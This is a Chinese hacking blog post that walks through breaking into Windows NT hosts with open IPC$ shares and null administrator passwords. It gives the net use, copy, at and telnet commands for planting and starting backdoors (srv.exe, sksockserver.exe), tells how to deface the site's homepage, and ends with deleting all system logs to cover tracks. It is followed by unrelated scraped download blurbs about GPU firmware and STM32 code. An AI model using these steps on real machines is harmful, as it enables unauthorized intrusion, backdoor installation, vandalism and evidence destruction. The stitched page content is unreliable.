NT的简单攻击(II)流光攻击ipc$主机

本文介绍使用流光软件扫描并攻击具有IPC$共享的Windows主机的过程。通过获取管理员权限,复制后门程序srv.exe和sksockserver.exe到目标主机,并利用at命令定时启动后门程序。进一步操作包括更改网站主页和安装木马。
NT的简单攻击(II)流光攻击ipc$主机
 
 

最近很懒,好长时间没写原创了,今天写个流光攻击ipc$的主机吧,可能有的朋友要问攻击ipc$的主机与QQ有什么关系呢?呵呵,一会你就知道了
  首先用流光扫描一段ip,目标,台独分子网站,ipc是什么?你也太差了,连这个都不知道,ipc是进程间通信呗,是连接server到server之间通信用的,ipc$也就是win2k默认开的共享,唉呀,不说了,只要你知道有这个ipc就行了。
一会儿,流光扫描完毕,询问是否查看入侵报告,确定,哈哈,扫到了不少ipc$的主机,随便拿来个user:administrator(admin) password:(null)的主机,(如图)



呵呵,这个administrator还是超级权限呢,你问我是怎么知道的?拷,流光告诉我的呗,user:administrator(admin)这个(admin)就是说明administrator这个用户具有超级权限!不废话了,既然用户名,密码知道了,那就开始工作吧,打开开始--附件--c命令提示符,也就是cmd,在c:/下输入net use //x.x.x.x/ipc$ /user:"administrator"回车。显示密码和用户名在//x.x.x.x/ipc$上无效,请键入 //x.x.x.x/ipc$的用户名和密码。刚才我们看到的密码不是null吗?只要敲一下回车就可以了,显示命令成功完成,(如图)


现在我们要做的是copy几个exe到肉机下,输入copy f:/a/srv.exe //x.x.x.x/admin$显示已复制一个文件。copy f:/a/sksockserver.exe //x.x.x.x/admin$显示已复制一个文件,这样我们就将这两个exe复制到肉机的c:/winnt目录下了,现在我们用at命令来启动srv.这个后门,登陆到肉机的99端口,先用net time //x.x.x.x 查看一下远程服务器的时间,显示//x.x.x.x当前时间是2002/1/1 下午 2:00, 输入at //x.x.x.x 14:02 srv.exe显示新加了一项作业 其作业id=1.也就是说在14:02的时侯启动这个srv.好,倒计时开始,3.2.1.时间到,输入telnet x.x.x.x 99回车。哈哈,进去了,是否对方的c:/winnt/system32提示符出现了.开始安装刚刚拷贝过去的sksockserver.exe吧!啊?cmd打不字了?盲操做,发挥发挥你丰富的想像力吧,输入sksockserver.exe -install 显示snake sockproxy service installed 启动它,net start skserver 显示snake sockproxy service (如图)


另外,既然你现在是这台主机上的webmaster,你还可以干点别的吧,可以开个后门,以后干活方便,里应外合,copy个木马,用小马马控制他, 黑他的主页,主页一般在c:/inetpub/wwwroot目录下,一般默认文件名为index.htm default.htm。index.asp default.asp.以我的经验:主页放在默认目录的很少,告诉你一个小窍门,主页一般不都有返回道页这一栏吗?你把鼠标放在上面就可以看到他的主页路径了,找到最后的文件名,比如最后的文件名叫default.asp 用dir default.asp/s命令在每一个盘符下查找,找到之后用一下ren default.asp default.ccb 然后在刷新一下url.看看是否找不到主页了,如果找不到此页就对了!找到文件后就可以在dos下传主页了。 copy f:/index.htm //x.x.x.x/c$/inetpub/wwwroot下,覆盖原文件就可以了,这里我就不在赘述了!(如图) 


最后别忘了DEL掉日志。 我个人建议……要抹就抹个干净……只要是在C:\WINNT\SYSTEM32\LOGFILES下的*.*,全部删掉!~~~

 
打开链接下载源码: https://pan.quark.cn/s/c43e5bd27521 标题中的“AMD and Nvidia GOP update 1.9.6.rar”表示这是一个包含了AMD与Nvidia显卡的GOP(Graphics Output Protocol)驱动程序升级至1.9.6版本的压缩文件。该更新主要针对显卡在UEFI(统一可扩展固件接口)环境下的图形输出性能进行优化,并致力于提升系统的稳定性。在描述中提及“显卡附加UEFI引导工具,最新版”,表明此次更新内含了一个专为UEFI BIOS环境设计的显卡引导工具,或许表现为一个自启动脚本或程序,例如GOPupd.bat。通过这一工具,用户能够在UEFI模式下对显卡进行精确的配置和初始化,从而保障操作系统能够最大化地发挥显卡的效能。必需的组件包括“colorama-0.4.3”,这是一个在Windows平台上用于管理颜色控制序列的Python模块,可能在更新过程中用于生成彩色命令行显示,以增强用户交互的直观性。此外,“Visual C++Redistributable”是微软提供的运行时支持库,旨在确保基于C++编译的应用程序能够正常运行,此处可能用于更新工具或相关依赖模块。标签“uefi bios”突显了该更新与UEFI BIOS系统的紧密关联,暗示其将作用于计算机的启动序列及硬件初始化过程。压缩包内的文件清单如下: 1. GOPupd.bat - 很有可能是负责执行GPU UEFI引导更新的核心脚本。 2. #Nvidia_ROM_Info.bat 和 #AMD_ROM_Info.bat - 这两个文档可能用于采集Nvidia与AMD显卡的ROM数据,以辅助识别显卡型号并执行适配性验证。 3....
代码下载地址: https://pan.quark.cn/s/a2e2c95e6128 意法半导体(STMicroelectronics)研发的STM32H750是一款性能优越的微控制器,属于STM32H7系列,拥有卓越的处理性能以及多元化的外设接口。在此项工作中,我们将研究如何借助STM32H750达成串口空闲中断(IDLE interrupt)的运用、借助DMA完成UART(通用异步收发传输器)的数据传输,并且探究如何运用STM32CubeMX配置并构建MDK5(Keil uVision5)项目。串口空闲中断是串口通信中的一个核心功能,当串口在一段时间内没有进行数据交换时,会引发该中断。这种功能在需要实时监测串口状态的应用场合中非常有价值,比如,在等待特定指令或需要降低能耗的情况下。在STM32H750中,设定串口空闲中断通常包含以下几个环节: 1. 串口设置:在STM32CubeMX中选定相应的UART接口,并激活中断功能。 2. 中断优先级设定:按照应用需求设定中断优先级。 3. 中断服务函数注册:在程序代码中定义中断服务函数以应对中断事件。 4. 启用串口空闲中断:在初始化代码中激活串口的IDLE位,使能中断。 DMA(Direct Memory Access)传输是一种高效的数据传输机制,它允许外设直接与内存进行交互,无需CPU的介入,从而减轻了CPU的工作负担。在STM32H750中,我们可以运用DMA配合UART来接收数据: 1. DMA配置:在STM32CubeMX中为UART选择合适的DMA通道,并设定传输特性。 2. UART配置:将UART设置为DMA模式,并指定接收缓冲区的地址。 3. 中断配置:开启DMA传输完成中断,以便在数据接收完...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值